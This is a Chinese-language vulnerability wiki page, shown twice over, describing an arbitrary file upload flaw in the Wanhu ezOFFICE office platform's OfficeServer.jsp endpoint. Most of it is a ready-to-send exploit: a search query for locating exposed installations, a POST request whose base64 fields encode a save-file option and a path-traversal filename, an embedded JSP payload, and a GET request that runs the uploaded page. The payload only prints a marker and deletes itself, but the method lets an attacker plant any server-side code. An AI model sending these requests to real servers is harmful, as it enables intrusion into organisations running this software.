fofamini-wiki

登录白背景

源码

万户协同办公平台 ezoffice iWebOfficeSign/OfficeServer存在任意文件上传漏洞

一、漏洞简介

万户ezOFFICE协同管理平台是一个综合信息基础应用平台。万户协同办公平台 ezoffice iWebOfficeSign/OfficeServer存在任意文件上传漏洞

二、影响版本

万户ezoffice

三、资产测绘

hunterapp.name="万户 Ezoffice OA"
登录页面

四、漏洞复现

POST /defaultroot/public/iWebOfficeSign/OfficeServer.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

DBSTEP V3.0     145             0               105             DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
RECORDID=
isDoc=dHJ1ZQ==
moduleType=Z292ZG9jdW1lbnQ=
FILETYPE=Ly8uLi8uLi9wdWJsaWMvZWRpdC9jZXNoaS5qc3A=
<% out.println("123456");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>

GET /defaultroot/public/edit/ceshi.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

原文: https://www.yuque.com/xiaokp7/ocvun2/yiwt2oxwolt8vhkn

# 万户协同办公平台 ezoffice iWebOfficeSign/OfficeServer存在任意文件上传漏洞

# 一、漏洞简介
万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台 ezoffice iWebOfficeSign/OfficeServer存在任意文件上传漏洞

# 二、影响版本
+ 万户ezoffice

# 三、资产测绘
+ hunter`app.name="万户 Ezoffice OA"`
+ 登录页面

![1694241158110-8d4eef16-79f1-46eb-899b-344bd2a7a19f.png](./img/RS1iggbiXDGjDhuV/1694241158110-8d4eef16-79f1-46eb-899b-344bd2a7a19f-711298.png)

# 四、漏洞复现
```plain
POST /defaultroot/public/iWebOfficeSign/OfficeServer.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

DBSTEP V3.0     145             0               105             DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
RECORDID=
isDoc=dHJ1ZQ==
moduleType=Z292ZG9jdW1lbnQ=
FILETYPE=Ly8uLi8uLi9wdWJsaWMvZWRpdC9jZXNoaS5qc3A=
<% out.println("123456");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
```

![1719307186118-7d458e56-8f7d-4f33-ad6f-e93ce1347f22.png](./img/RS1iggbiXDGjDhuV/1719307186118-7d458e56-8f7d-4f33-ad6f-e93ce1347f22-486067.png)

```plain
GET /defaultroot/public/edit/ceshi.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
```

![1719307219690-7c0b511b-14fc-4d64-b8d0-16b5ebdb30d1.png](./img/RS1iggbiXDGjDhuV/1719307219690-7c0b511b-14fc-4d64-b8d0-16b5ebdb30d1-145585.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yiwt2oxwolt8vhkn>